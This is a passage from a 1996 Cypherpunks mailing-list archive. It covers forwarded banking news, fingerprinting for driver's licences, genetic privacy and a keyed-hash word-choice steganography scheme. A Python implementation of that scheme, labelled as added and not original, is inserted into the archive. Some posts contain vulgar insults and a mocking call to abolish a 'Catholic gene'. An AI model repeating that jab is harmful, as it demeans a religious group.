The OCC > list includes the Bank of England, a Washington, D.C., entity not > associated with London's famous "old lady on Threadneedle Street" and > Citicorp Financial Services, a Beverly Hills firm not associated with > the better-known institution of that name. It also includes the First > Bank of Internet, which heralds itself as the first bank in cyberspace. > > Through its periodic "special alerts," the OCC warns banks to "view with > extreme caution any proposed transaction involving any of the listed > entities." It makes no effort to educate members of the general public > who unknowingly place their money and trust in those uninsured > institutions. > > > > > American Banker: Friday, August 30, 1996 > > Swift Near Alliance in Trade Document Automation > > By STEVEN MARJANOVIC > > Swift, the international banking telecommunications network, wants to > play a bigger role in trade finance and the exchange of related > documentation. > > Sources said the Brussels-based organization will soon take a position-- > perhaps as early as its September board meeting-- on whether to work on > trade automation in cooperation with another consortium, called Bolero. > > Such a move would involve an increase in nonbank participants on a > bank-owned network that has approached such liberalization cautiously. > > Swift, formally the Society for Worldwide Interbank Financial > Telecommunication, is used by 5,300 banks for exchanging messages in > such areas as funds transfer, foreign exchange, and securities. > > The network averaged about 2.7 million messages a day in July, > representing daily dollar volumes exceeding $2 trillion. > > Officials said Swift is nearing a decision to work with the Bolero > Association, which is forming an electronic registry for the so-called > "dematerializing" of trade documents. Swift could provide the "platform" > for allowing banks and corporations to exchange such documentation as > letters of credit and bills of lading. 
> > Bolero was formed in 1994 with funding from the European Commission, but > has not formulated concrete operating plans. Its members include > Citicorp, Barclays Bank PLC, and other multinational banks and > corporations. > > Peter Scott, trade services market director at Swift, said it has been > in discussions with London-based Bolero since December 1995 about > joining forces to automate the exchange of trade documents. > > "Bankers are beginning to sense both the opportunities in those areas > and the threats to them from an intermediary stepping in and potentially > taking away the business," Mr. Scott said. > > Trade-document capability "is not a heavily utilized area within Swift > at the present time," he said. > > The potential in automation is obvious to Bolero officials. At the New > York Banktrade Conference recently, John McKessy, the association's > North American representative, said the annual value of goods moved > internationally approaches $4 trillion. > > He estimated current international trade requires some three billion > documents to be issued and managed. > > The cost of dealing with paper alone eats up about 7% of the total value > of those goods, as much as $280 billion, Mr. McKessy said. > > Bank revenues from issuing letters of credit last year were just over $1 > billion, according to a soon-to-be-released survey by the U.S. Council > on International Banking. > > Anthony K. Brown, senior vice president of trade services at MTB Bank, > described trade transaction processing as "extremely cumbersome and > tedious, prone to mistakes and delays (that) can be a hindrance to the > completion of a transaction." > > MTB is a $400 million-asset merchant bank based in New York. About 80% > of its $100 million in loans are trade-related. > > The paper-shuffling costs are not borne entirely by banks. Import/export > companies, insurers, freight forwarders, and various government > inspection agencies are also involved. 
> > "The question is whether Swift wants to do it," said Dan Taylor, > president of the New York-based U.S. Council. > > "Swift is going to act fairly quickly on this," he added. > > Mr. Taylor said Swift officials will likely grapple once again with the > political and philosophical issues of giving nonbanks more access to > Swift, and to payment systems generally. > > In 1995, the network granted partial access to nonbanks after years of > heated debate. > > "You always have this push and pull, where some banks would like Swift > to do certain things" while others want the network to focus on the > money transfer business, Mr. Taylor said. > > "If Bolero succeeds and Swift joins, I think it will move fairly > rapidly, but I'm not sure that Bolero is going to be the only thing out > there." > > He said Bolero might evolve using value-added networks - or intranets - > like the IBM Global Network and General Electric Information Services > Co., or perhaps even the Internet. > > Indeed, another member of Bolero, CSI Complex Systems Inc., New York, is > apparently talking to several providers of private, value-added networks > and may soon enter a contract with one. > > CSI letter-of-credit software leads the pack in banking, with about a > 16% market share, Mr. Taylor said. > > The company recently formed a business unit called Electronic Documents > International, which has developed an Internet-based system for > initiating letters of credit. CSI spokesman George Capsis said the > software, Import.com, creates "about 30 key documents involved in > international trade." > > The Internet, enhanced with security features, may help the trade > industry reduce paper-related costs, especially at smaller companies > overseas. 
> > CSI managing director Andre Cardinale said customers need only to "dial > into a bank's Internet server, pull up the Import.com application, and > actually fill in the details to create a new letter of credit or an > amendment to an existing one." > > While Bolero may find a place on the Internet or a GE-type network, Mr. > Cardinale said the ultimate push may yet come from the banking industry > working collectively through Swift. > > He said Swift opposition from nonbank constituencies that are concerned > the telecommunications cooperative will be more sympathetic to banks > when disputes arise. > > But "if Swift does it," he added, "it will bring banks into the universe > far more - pardon the pun - swiftly." > > > Crain's New York Business: August 26, 1996 > > Bloomberg to Detail Growth of Information Empire > > Michael Bloomberg made a name for himself on Wall Street with his > trading acumen and mastery of the computer systems that were becoming > crucial to success in the securities business. > > But no one suspected when he left Salomon Brothers in 1981 that in the > next decade he would build the fastest-growing provider of financial > information in the world. > > Mr. Bloomberg, whose company Bloomberg Financial Markets has estimated > sales of $600 million, will be the keynote speaker at the fifth annual > Crain's ''Growing a Business Expo,'' to be held this year on Thursday, > Oct. 24. > > The event will take place at the New York Hilton & Towers from 8 a.m. to > 1 p.m. It is presented by Citibank and co-sponsored by Con Edison and > Empire Blue Cross and Blue Shield. > > Last year, more than 1,000 growing business owners and managers attended > the expo, which provides information for companies operating in the city > regarding potential suppliers, financial resources and government > programs. > > The cost to attend the event is $45 and includes a continental > breakfast. Individuals registering before Sept. 6 can bring a colleague > for free. 
To register, call Flagg Management at (212) 286-0333. > > In addition to Mr. Bloomberg's speech, attendees will be able to attend > seminars on financing and other help available from the city, financing > techniques, energy cost savings programs and how to reduce health > insurance costs. An expected 135 exhibitors will be offering products > and services of use to growing companies. > > Crain's New York Business editors will discuss how a growing business > can get coverage in Crain's and in other publications. > > The heart of Mr. Bloomberg's empire is a news gathering operation that > sends information through 62,000 computer terminals installed on the > desks of investment professionals around the nation. His company > provides the latest financial news and sophisticated tools to analyze > information. > > The company he has built is noted for its lack of bureaucracy despite > its growth to 2,000 employees. Its hallmarks are hands-on leadership and > an entrepreneurial atmosphere where employees receive perks such as free > food. > > Mr. Bloomberg has extended his reach to include an all-news radio > station in New York, WBBR; Bloomberg Personal TV; syndicated television > shows; a monthly personal finance magazine; and a similar magazine for > institutional investors. > > > American Banker: Friday, September 6, 1996 > > America Online Opens a New Banking Channel > > By DREW CLARK > > Nineteen banks - national home banking stalwarts such as Citicorp and > BankAmerica, plus a complement of less prominent regionals - have > climbed onto the America Online bandwagon. > > Most already offer their customers several options for banking via > personal computer and view America Online, with its six million > subscribers, as a way to appeal to a broad cross-section of computer- > literate consumers. > > Fourteen of the AOL banking partners will be delivering services through > BankNow, a software package developed for the interactive network by > Intuit Inc. 
> > The other five banks have opted to use their own software. One of them - > Security First Network Bank, which operates entirely on the Internet - > will invite AOL users in through their Web browsers. > > With its announcement this week, America Online Inc. takes its place > among the many alternative "channels" for on-line banking. > > Many of the banks on AOL's list are simultaneously cooperating with > other companies that are themselves competitors, such as Intuit and > Microsoft Corp., suppliers of the Quicken and Money financial management > software, respectively. > > Also crossing competitive lines, America Online said its subscribers > will be able to bank from home with PC software from three suppliers > other than Intuit: Checkfree Corp., Online Resources and Communications > Corp., and Visa Interactive. > > "Everyone understands that there is competition in the home banking > arena," said David Baird, general manager of the personal finance > division at America Online, based in Dulles, Va. "To align ourselves > with exclusively one company would be a mistake." > > Intuit can count on 14 initial bank users of BankNow. Spokesmen for the > other three system vendors declined to say when they expect to have home > banking products available for the AOL channel. > > Experts noted that AOL and Intuit could be a strong tandem, in that they > dominate their respective businesses. > > Intuit's Quicken is the leading brand in personal finance software. The > company claims more than 9 million active users and a market share of > about 80%. > > America Online's subscriber base of six million is as big as those of > its next two competitors, Compuserve and Prodigy, combined. 
> > The financial institutions currently offering BankNow are: American > Express, Bank of Stockton (Calif.), Centura Banks Inc., Commerce Bank of > Kansas City, Mo., Commercial Federal of Omaha, Compass Bank of Alabama, > CoreStates Financial Corp., Crestar Financial Corp., First Chicago NBD > Corp., Laredo (Tex.) National Bank, M&T Bank of Western New York, > Marquette Bank of Minneapolis, Sanwa Bank California, and Union Bank of > California. > > More plan to offer BankNow-based services through AOL later this year: > BankAtlantic of Florida, Bank of Boston, First Hawaiian Bank, First > Michigan Bank, Mellon Bank, Signet Bank, and U.S. Bank of Oregon. > > Unlike Quicken, BankNow software is available free to America Online > subscribers. > > Banks' fees will vary. First National Bank of Chicago said it will > charge $3.95 a month for on-line banking and $9.95 a month for other > services that include bill payment. > > Centura Banks Inc. said it will offer on-line banking free, and charge > $5.95 a month for bill payment. > > Intuit officials declined to disclose what its Intuit Services Corp. > processing unit will charge to handle these transactions for banks. > > Some of Intuit's larger bank partners chose not to offer BankNow because > they already promote their own PC banking programs. > > For example, Citicorp, First Union, and Wells Fargo each support > Quicken, but passed on BankNow. Instead, they are paying a premium for a > "button" on America Online's banking screen that will eventually link > users to a proprietary home banking program. > > > > AP Online: Thursday, September 5, 1996 > > House Probes Money Laundering > > By ROB WELLS > > House Banking Committee members on Thursday urged a Treasury Department > agency to step up its efforts to halt money laundering by Mexican drug > lords. > > Rep. 
Spencer Bachus, R-Ala., urged the Financial Crimes Enforcement > Network to put in place new regulations to plug a significant loophole > that allows Mexico's drug dealers to place their ill-gotten profits back > into the U.S. > > Bachus, chairman of the House Banking oversight subcommittee, said > Congress gave authority to FinCen in 1994 to put in place new rules that > would prevent drug dealers from using foreign bank drafts, a type of > check, to evade currency reporting restrictions. > > ''That effort is long, long overdue,'' Bachus said. > > Rep. Henry Gonzalez, D-Texas, asked the agency to provide further > details about suspected money laundering in his home town of San > Antonio, particularly the source of a $3 billion cash surplus in the San > Antonio Federal Reserve Bank. > > The issue arose as Bachus' panel began exploring the dramatic rise of > narcotics traffic along the 2,000 mile long U.S.-Mexico border, and the > ease with which drug dealers can ship their profits to the south. Money > laundering refers to the practice by which drug dealers, mobsters and > others funnel their illegal profits into the banking system through > businesses or other means. > > Bachus said estimates of drug profits laundered through Mexico range > from $6 billion to $30 billion per year. Stanley E. Morris, FinCen's > director, defended his agency's record, saying a combination of new > rules and tougher enforcement in the past decade has ''made it more > difficult to launder money in the U.S.'' and increased the costs of > money laundering. Morris' agency enforces the Bank Secrecy Act, a key > weapon against money laundering. > > As for the new rules aimed at foreign bank drafts, Morris said the > regulations are more difficult than first expected because such > restrictions also could hinder legitimate commerce. He said the proposal > would be released soon.
> > FinCen is working on other fronts to combat money laundering, which > includes a new computer system that tallies bank fraud to help > regulators gain an early warning of money laundering. > > In addition, the Clinton Administration assisted Mexico in adopting new > anti-money laundering rules earlier this year. And Treasury Secretary > Robert Rubin convened a conference of 29 nations in December 1995 to > focus on the money laundering problem. > > One committee member, Rep. Maxine Waters, D-Calif., addressed the > political context of the hearings. > > Waters said she was suspicious that the Republican-led Congress was > holding ''a rash of hearings this month ... on the subject of drugs just > as Presidential candidate Dole tries to use the issue as part of his > campaign strategy against President Clinton.'' > > Waters said if the GOP-led House ''is truly serious about the impact of > drugs'' it should hold hearings about charges raised in a San Jose > Mercury News investigative series last month concerning the role > CIA-backed rebels in Nicaragua played in bringing crack cocaine and > weapons to Los Angeles and other cities. > > Bachus told Waters the hearing wasn't motivated by politics and that he > had personally been involved in anti-drug efforts prior to his election > to Congress. > > --- > > Dr.Dimitri Vulis KOTM Fuckhead. From steve at edmweb.com Thu Sep 19 02:50:33 1996 From: steve at edmweb.com (Steve Reid) Date: Thu, 19 Sep 1996 17:50:33 +0800 Subject: really undetectable crypto made somewhat practical In-Reply-To: <199609190126.VAA01522@beast.brainlink.com> Message-ID: I'm on FCPUNX instead of regular Cypherpunks, so please excuse me if I'm a little behind the thread. > New Scheme: First, calculate the MD5 hash of all the words in the various > dictionary files used by the password cracker program and create a > database containing every word and the first 4 bits of its MD5 hash. 
> Given such a database, it would be possible to write a program that > accepts as input a block of cyphertext (the stego message, encrypted), > chunks it up into groups of 4 bits and then, for each chunk, displays the > words that have hashes that start with those same four bits. The person > running the program would select words that form meaningful sentences but > also produce hashes that combine into the encrypted stego message. This > scheme would send 4 stego bits per word.

As a slight improvement, you could turn this into a complete stealth encryption scheme, using only the one-way hash function operating as a MAC. Instead of hashing just the word in an effort to get stego bits, you could hash a key along with the word. In order to get the intended hash you would need to know the key. Since you're probably hashing a whole block of 512 bits (or whatever's specified in the algorithm) appending a key should not affect the speed of the system. I'm certain that this would increase the security, possibly enough that you wouldn't need to use a regular encryption algorithm (but I wouldn't bet on it). Crude example: Assume that Alice can use the words "Greetings" and "Salutations" interchangeably without drawing suspicion. Also assume that "PASSWD" is a secret known only to Alice and Bob, and that the stego software looks at the low bit of an MD5 hash.

MD5 ("GreetingsPASSWD") = c7bf6e051731a0dcf52baa330c9d2e7d <- low bit=1
MD5 ("SalutationsPASSWD") = 2dd2ba080b5feb060ffbc6d196fd1b34 <- low bit=0

If you say "Greetings" you're sending a 1, if you say "Salutations" you're sending a 0. Eve doesn't know about "PASSWD" so she can't do the hash and figure the bit. Of course, if you're using this to send more bits, you'll need something harder to guess than "PASSWD". The trick is in figuring out which words have stego bits and which don't. It might be better to stego bits into a whole line instead of a word, as that would probably offer more flexibility.
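The keyed word-choice scheme described above, worked through as an added example that is not part of the original post. It swaps HMAC-SHA256 in for the post's MD5(word + key), mixes the slot position into the hash, and assumes both parties share the constructed synonym table `SLOTS`; a slot carries a bit only when its candidates yield both bit values under the key, which is one answer to "which words have stego bits and which don't".

```python
import hashlib
import hmac

# Constructed synonym groups (an assumption of this example), agreed in
# advance by both parties. Slot i of the cover text uses SLOTS[i % len(SLOTS)].
SLOTS = [
    ("Greetings", "Salutations", "Hello"),
    ("friend,", "colleague,", "neighbour,"),
    ("the meeting", "our meeting", "that meeting"),
    ("went well", "went fine", "was good"),
    ("and", "so", "plus"),
    ("I will", "I shall", "I'll"),
    ("call", "phone", "ring"),
    ("tomorrow.", "soon.", "later."),
]
MAX_SLOTS = 10_000  # safety bound on cover length


def keyed_bit(key: bytes, position: int, phrase: str) -> int:
    """Low bit of HMAC-SHA256(key, position || phrase)."""
    msg = position.to_bytes(4, "big") + phrase.encode("utf-8")
    return hmac.new(key, msg, hashlib.sha256).digest()[-1] & 1


def slot_options(key: bytes, position: int) -> dict:
    """Map each reachable bit value to the first phrase that produces it."""
    options = {}
    for phrase in SLOTS[position % len(SLOTS)]:
        options.setdefault(keyed_bit(key, position, phrase), phrase)
    return options


def encode(key: bytes, bits: list) -> list:
    """Choose one phrase per slot so the keyed bits spell out `bits`."""
    cover, pending, position = [], list(bits), 0
    while pending:
        if position >= MAX_SLOTS:
            raise ValueError("cover text grew past MAX_SLOTS")
        options = slot_options(key, position)
        if len(options) == 2:
            # Usable slot: both bit values are reachable, so it carries a bit.
            cover.append(options[pending.pop(0)])
        else:
            # Every candidate hashes to the same bit: filler, skipped on decode.
            cover.append(SLOTS[position % len(SLOTS)][0])
        position += 1
    return cover


def decode(key: bytes, cover: list) -> list:
    """Recompute the keyed bit of every phrase that sits in a usable slot."""
    bits = []
    for position, phrase in enumerate(cover):
        if phrase not in SLOTS[position % len(SLOTS)]:
            raise ValueError(f"unexpected phrase at slot {position}: {phrase!r}")
        if len(slot_options(key, position)) == 2:
            bits.append(keyed_bit(key, position, phrase))
    return bits


def to_bits(data: bytes) -> list:
    return [(byte >> shift) & 1 for byte in data for shift in range(7, -1, -1)]


def from_bits(bits: list) -> bytes:
    whole = len(bits) - len(bits) % 8
    return bytes(
        sum(bit << (7 - i) for i, bit in enumerate(bits[n:n + 8]))
        for n in range(0, whole, 8)
    )


if __name__ == "__main__":
    shared_key = b"constructed shared secret"  # sample value for the demo
    cover_text = encode(shared_key, to_bits(b"noon"))
    print(" ".join(cover_text))
    print(from_bits(decode(shared_key, cover_text)))
```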
===================================================================== | Steve Reid - SysAdmin & Pres, EDM Web (http://www.edmweb.com/) | | Email: steve at edmweb.com Home Page: http://www.edmweb.com/steve/ | | PGP (2048/9F317269) Fingerprint: 11C89D1CD67287E68C09EC52443F8830 | | -- Disclaimer: JMHO, YMMV, TANSTAAFL, IANAL. -- | ===================================================================:) From batman at infomaniak.ch Thu Sep 19 03:00:35 1996 From: batman at infomaniak.ch (Batman) Date: Thu, 19 Sep 1996 18:00:35 +0800 Subject: Bernstein hearing reminder: THIS Friday 11:45AM, SF Federal Building Message-ID: <01BBA60C.5AD5CCC0@misd145.cern.ch> For the 200th time, unsubscribe me of your fucked mail lists. From dougr at skypoint-gw.globelle.com Thu Sep 19 03:12:36 1996 From: dougr at skypoint-gw.globelle.com (Douglas B. Renner) Date: Thu, 19 Sep 1996 18:12:36 +0800 Subject: Counter "noise" with "signal" (please?) Message-ID: If a S/N ratio becomes irritating, by all means, don't increase the denominator! In other words, do your part to let undeserving threads die. Certain things can only be dignified with a response, but I imagine that goes without saying. -Doug Renner From dougr at skypoint-gw.globelle.com Thu Sep 19 03:24:20 1996 From: dougr at skypoint-gw.globelle.com (Douglas B. Renner) Date: Thu, 19 Sep 1996 18:24:20 +0800 Subject: Morality, Responsibility, Technology. Message-ID: Some previous thread mentioned the potential usefulness of a large database containing private medical information, and possibly genetic detail as well. While I agree on the tremendous constructive potential of such a hypothetical data-mine, I seriously doubt that Mankind has the moral integrity to use this type of knowledge responsibly. Supposing for example, a particular genetic "defect" were found with such a database to have a 90% correlation with the presence of epilepsy. Immediately, doctors & scientists would strive to find a way to gain some leverage against this "defect."
We might for example see a testing procedure for human fetuses to determine whether a particular pregnancy "should be" terminated. People would become famous, and much money would change hands due to this "discovery." Generally people will conclude that Science has given them more control over their lives than they previously had. The problem is, nobody really understands just what this "defect" really means. Nobody understands why it is there, or what kind of a choice we are really making by attempting to remove it from our gene pool. Remember that Sickle Cell Anemia is caused by a genetic "defect". We are lucky enough to know that the carriers of this "defect" are uniquely able to survive certain plagues. This so-called "defect", as troublesome as it may be to some individuals, is really a latent strength, which is how natural selection reinforced it in the first place, and we may need it again. The term "defect" is therefore entirely out of line. We have no business placing judgements from our own limited material value sets onto something which has the definite potential of affecting all future generations of Humanity. It's none of our business. Further, when such a database is eventually created, I ask not "who" but "what" will have access to it? What kind of non-sentient group mentality will have sufficient authority and be presumptuous enough to declare itself morally objective? What kind of a larger process might such an entity be unwittingly serving? We already have many times more material knowledge than we are morally capable of handling as a species. Here's one tiny example. The most widespread use of the knowledge of psychology is guess what? Advertising and Marketing. Our average American sits entranced watching hours of television daily, unwittingly absorbing countless impressions by advertisers with more money than morality. Can he identify the "glittering generalities" or the "bandwagon appeals" or any of the other effective forms of propaganda?
Does he know the truth from a lie when sexual titillation is part of the presentation? May he readily accept what is presented, and most of all: Does he see himself sitting there, absorbing these impressions? We don't see our selves in action. We can't know what we're doing. None of us have developed sufficient "presence" to know what we are really doing most of the time. We can't possibly be objective, except in extremely rare, life-changing moments, and even then only if we're lucky. Just thinking about yourself thinking isn't enough, because where are your emotions? Do you really understand why your thoughts are what they are? Did *YOU* put those thoughts in your head intentionally, or did they sort of happen on their own... one thought following another through some combination of association and external stimuli? And while you've been busy reading this, with your attention directed outward, why haven't you been aware of the sensation in your feet, or the tension in your face, or your posture, or your breath? As westerners we have directed so much of our attention "outward" that we develop little or no objective knowledge of what goes on within us. Can we break this cycle? If there really are esoteric schools, with disciplines and methodologies of obtaining self-knowledge, then this knowledge must be such that by its very nature, it cannot possibly be communicated successfully in any large, public manner. But I digress. As a reader of this list, have you ever asked yourself Why, why is it that you personally want strong encryption to be widely available? It's a very powerful emerging technology, and it's in the palm of your hands. Douglas B. 
Renner dougr at usa.globelle.com From stewarts at ix.netcom.com Thu Sep 19 04:50:57 1996 From: stewarts at ix.netcom.com (Bill Stewart) Date: Thu, 19 Sep 1996 19:50:57 +0800 Subject: 56 kbps modems Message-ID: <199609190849.BAA01822@dfw-ix11.ix.netcom.com> At 10:41 AM 9/17/96 -0700, Eric Murray wrote: >Crypto/security related: how hard is it to hack a Frame Relay >connection? My impression is that it requires access to >one of the telco's routing computers, which would make it >about equivalent in difficulty to hacking POTS. Frame Relay doesn't get handled by the telco's POTS routing (unlike ISDN) - it's handled by whatever frame relay switch the telco uses. I don't know what Pac Bell uses; AT&T uses Stratacom switches, I think MCI uses Cascade, USWest uses a mixture. Frame switches mostly use Permanent Virtual Circuits, though Switched Virtual Circuits will be coming out in the next year or so. PVCs are pretty tough to hack, because they mostly get provisioned from an administrative interface on the switch rather than in-band. SVCs will offer a bit more risk, since switching is switching. But it's probably pretty tough. 
# Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto From rp at rpini.com Thu Sep 19 05:10:58 1996 From: rp at rpini.com (Remo Pini) Date: Thu, 19 Sep 1996 20:10:58 +0800 Subject: Cryptologie: Conference internationale - 25 SEPT - Paris Message-ID: <9609190933.AA24701@srzts100.alcatel.ch> -----BEGIN PGP SIGNED MESSAGE----- Mime-Version: 1.0 Content-Type: text/plain Content-Transfer-Encoding: quoted-printable To: cypherpunks at toad.com Date: Thu Sep 19 11:31:08 1996 > September 25, 1996 > > Centre de Conférence Internationale > 19 Avenue Kleber, Paris 16, France > > Program, registration and further information (English): > http://www.epic.org/events/crypto_paris > I'll be there, how about any of you out there (yes, I know some of you will be there as a feature)? - ------< fate favors the prepared mind >------ Remo Pini rp at rpini.com PGP: http://www.rpini.com/crypto/crypto.html - ----< words are what reality is made of >---- From bryce at digicash.com Thu Sep 19 05:11:00 1996 From: bryce at digicash.com (bryce at digicash.com) Date: Thu, 19 Sep 1996 20:11:00 +0800 Subject: an author rating was: Re: Cypherpunk Enquirer [NOISE] In-Reply-To: <199609190441.AAA12078@dhp.com> Message-ID: <199609190939.LAA00616@digicash.com> -----BEGIN PGP SIGNED MESSAGE----- Authors: Bryce 9 Enquirer 9 Black Unicorn 7 Duncan Frissell 7 Robert A. Hettinga 7 Lucky Green 7 Sandy Sandfort 7 Hal 7 Perry E.
Metzger 7 Tim May 7 John Young 5 llurch 5 Rick Smith 5 Jim Bell 0 Vulis 0 Subjects: DigiCash 9 Ecash 9 Chaum 8 nym 7 Java 5 trust 5 government 0 policy 0 escrow 0 GAK 0 terror 0 freeh 0 clinton 0 whitehouse 0 white house 0 FBI 0 NSA 0 export 0 munition 0 From mikev at is.co.za Thu Sep 19 07:52:56 1996 From: mikev at is.co.za (Mike van der Merwe) Date: Thu, 19 Sep 1996 22:52:56 +0800 Subject: CIA hacked Message-ID: Hi everybody Heh! This one's good for a laugh :-)) http://www.odci.gov/cia Seems the DOJ hack was a good inspiration. Heh! Life's good when you're willing to work at it. Later Mike ____________________________________________________________________ I'm sure we will find out in a few years that Microsoft invented the Net. Or brought it to the masses. Or saved it from a certain and early demise. Or all of the above. JAMES SEYMOUR From stewarts at ix.netcom.com Thu Sep 19 08:18:15 1996 From: stewarts at ix.netcom.com (Bill Stewart) Date: Thu, 19 Sep 1996 23:18:15 +0800 Subject: GAK, GAP, GAY Message-ID: <199609190849.BAA01837@dfw-ix11.ix.netcom.com> At 10:52 AM 9/18/96 -0700, Tim wrote: >It doesn't matter if cash is still allowed if one cannot interact with any >health care person without a proper citizen-unit data base entry. They've >got you tracked even if you pay in gold dust. > >(Putting on my Duncan cap--not to be confused with dunce cap--I wonder what >will happen the first time someone dies because a hospital wouldn't treat >someone without a proper citizen-unit health care card?) By definition, without a citizen-unit health card number, a Health Status Transition Event can't be recorded, therefore nothing will happen.
It's possible that some auditor may notice a short-term increase in the amount of hazardous medical waste disposal at the facility that can't be properly allocated to health-services-consumption-units for cost recovery purposes, but there are overhead accounts for such things, which are simpler than creating fictitious accounts for "un-persons" or some such. # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto From jk at stallion.ee Thu Sep 19 08:46:32 1996 From: jk at stallion.ee (Jüri Kaljundi) Date: Thu, 19 Sep 1996 23:46:32 +0800 Subject: Mercenaries In-Reply-To: Message-ID: Wed, 18 Sep 1996, Timothy C. May wrote: > As to Michelle's point that Americans cannot serve for pay in other > militaries, there are all sorts of waivers and "look the other way"s > involved. For example, the retired American officer who became the top > military man in Estonia (or one of the Baltic States)--while still > retaining his U.S. citizenship. General Aleksander Einseln had some problems with US authorities because of working as the head of Estonian Army, I am not sure if he lost his US pension or not, at least that was what the US promised to do. He is having problems in Estonia right now BTW, some days ago the security police took him to interrogate him in the defense forces headquarters weapons smuggling case. That happened some days after he announced his consent to stand as the candidate for President of Estonia. This kind of bad attention did not allow him to set up his candidacy. No relevance to CP, I know :) Jüri Kaljundi AS Stallion jk at stallion.ee From jeffb at issl.atl.hp.com Thu Sep 19 09:34:31 1996 From: jeffb at issl.atl.hp.com (Jeff Barber) Date: Fri, 20 Sep 1996 00:34:31 +0800 Subject: DL in exchange for fingerprint Message-ID: <199609191223.IAA13606@jafar.issl.atl.hp.com> Oh joy. You no longer need to be arrested to get fingerprinted in Georgia.
On the front page of Wednesday's Atlanta Journal, under the headline "Now you can get driver's license in minutes": The average 45-day wait to get a new driver's license in Georgia will be a thing of the past under a new system that will churn them out while customers wait. "From start to finish it takes about 10 minutes," said chief examiner ... in charge of the Georgia State Patrol's driver's license office in Milledgeville where the system went into effect on Tuesday. Previously, drivers received a temporary paper license that was good for 45 days. ... ... Officials at the Department of Public Safety plan to have the new computer system in 82 locations across the state by Oct. 1. Georgia is the 32nd state with the system. After an eye exam, the applicant presses a finger down on a pad that registers the fingerprint in a state-wide memory bank. Then, the examiner confirms the name, address, and identifying information. ... The licenses have a hologram of the word "Georgia" behind the driver's name, age and address, and a bar code on the back that contains a laser recording of the driver's index fingerprints. "We keep a memory bank that matches your fingerprints with your license," [DoPS spokesman] said. "In other words, if you went to get a new license with a false birth certificate and your fingerprint didn't match the name, you wouldn't get a license. And you could also face possible investigation for fraud from the Public Safety's investigative division." ... "I think it's wonderful," said Katherine Kidd, the first Milledgeville driver to get the instant license. "It's a great idea. Now we don't have to wait forever." [ End quote ] Just what I would have called it: a great idea. Is it true that 31 other states take your fingerprint as part of the license application? I feel sick. 
-- Jeff From jya at pipeline.com Thu Sep 19 09:36:40 1996 From: jya at pipeline.com (John Young) Date: Fri, 20 Sep 1996 00:36:40 +0800 Subject: SAB_tag Message-ID: <199609191243.MAA17222@pipe1.ny2.usa.pipeline.com> 9-19-96. NYP: "New Method of Internet Sabotage Is Spreading." Markoff. Sabotage reported by Panix is spreading and has now occurred at least a dozen other World Wide Web sites around the nation. Officials concede that there is no easy defense against the attack. One said. "I think this is sick, but I guess that is what these guys do." "Regulators Turn Spotlight on Cybermoney." As concerns grow about electronic money laundering, cybercounterfeiting and bank runs on the Internet, regulators around the world are scurrying to catch up with the rapid development of electronic money. The US plans to announce today two initiatives intended to grapple with the new technology, and in another move, G-7 will examine the international cooperation needed as money moves through the borderless world of the Internet. ----- http://jya.com/sabtag.txt (14 kb for 2) SAB_tag ---------- Pipeline is sluggish due to transition to Mindspring operation. Responses may be slow or never. Try again after 2000, or forget about it, go Luddite. From weber at iez.com Thu Sep 19 10:11:58 1996 From: weber at iez.com (Rolf Weber) Date: Fri, 20 Sep 1996 01:11:58 +0800 Subject: GLOBAL ALERT: GERMAN GOVERNMENT PUSHES BLOCKAGE OF NETHERLANDS WEB SITES In-Reply-To: <199609181645.SAA29420@xs1.xs4all.nl> Message-ID: <9609191310.AA11909@spibm02> i absolutely agree with what you said, but let me correct this misunderstanding: > > GERMAN GOVERNMENT PUSHES BLOCKAGE OF NETHERLANDS WEB SITES. > it was *not* the german government, it was the public prosecutor general, who pushed this blockage. the german government recently said, that ISPs shouldn't (and aren't!) be responsible for what they're transmitting.
but like other democratic states, in germany the public prosecutor is independent from government... rolf -- ----------------------------------------- Rolf Weber | All I ask is a chance IEZ AG D-64625 Bensheim | to prove that money ++49-6251-1309-109 | can't make me happy. From hootie at netrix.net Thu Sep 19 10:12:07 1996 From: hootie at netrix.net (hootie at netrix.net) Date: Fri, 20 Sep 1996 01:12:07 +0800 Subject: Bernstein hearing reminder: THIS Friday 11:45AM, SF Federal Building Message-ID: <9609191315.AA19307@netrix.net> Me too! At 09:24 AM 9/19/96 +-200, Batman wrote: >For the 200th time, unsubscrive me of your fucked mail lists. > > > From mixmaster at remail.obscura.com Thu Sep 19 10:21:47 1996 From: mixmaster at remail.obscura.com (Mixmaster) Date: Fri, 20 Sep 1996 01:21:47 +0800 Subject: No Subject Message-ID: <199609191230.FAA09141@sirius.infonex.com> "Drivers Must Allow Fingerprinting" By Ralph Ellis _The Atlanta Constitution_ 9/19/96 "Georgians renewing or getting a new driver's license after Sept. 30 will have to provide the state with two fingerprints. "The right and left index fingerprints will be taken with an inkless scanning device that is part of a digital imaging system being installed in 82 driver's license examination offices across the state said Gordy Wright, spokesman for the Georgia Department of Public Safety. SNIP "The fingerprints will make it difficult for people to obtain licenses with falsified identification papers, Wright said. "Teresa Nelson of the Ga. Civil Liberties Union said the fingerprinting invades the privacy of law-abiding citizens. "'I have grave concerns,' she said. 'When we think of giving a fingerprint, we think of being arrested. We feel like we've done something wrong, not because we are complying with the law and are doing something right.' "There will be no exceptions to the fingerprint requirement..., Wright said, adding that 'having a driver's license is a privilege,' not a right.
SNIP "Wright said...the fingerprints eventually will be available to other law enforcement agencies and courts.... SNIP "The new licenses will include an instant photo....A bar code on the back will contain a laser recording of the driver's index fingerprints...." From proff at suburbia.net Thu Sep 19 10:25:51 1996 From: proff at suburbia.net (Julian Assange) Date: Fri, 20 Sep 1996 01:25:51 +0800 Subject: Morality, Responsibility, Technology. In-Reply-To: Message-ID: <199609191327.XAA00418@suburbia.net> > The term "defect" is therefore entirely out of line. We have no business > placing judgements from our own limited material value sets onto > something which has the definite potential of affecting all future > generations of Humanity. It's none of our business. The problem however, is that artificial selection may be the only way to select beneficial attributes at all. What is presently being selected for in western societies is all the factors that lead to a lack of practice or belief in birth control. I'll let the reader think for a moment on just what those are. Perhaps we can also somehow test for and abolish the "Catholic" gene? -- "Of all tyrannies a tyranny sincerely exercised for the good of its victims may be the most oppressive. It may be better to live under robber barons than under omnipotent moral busybodies, The robber baron's cruelty may sometimes sleep, his cupidity may at some point be satiated; but those who torment us for our own good will torment us without end, for they do so with the approval of their own conscience." - C.S.
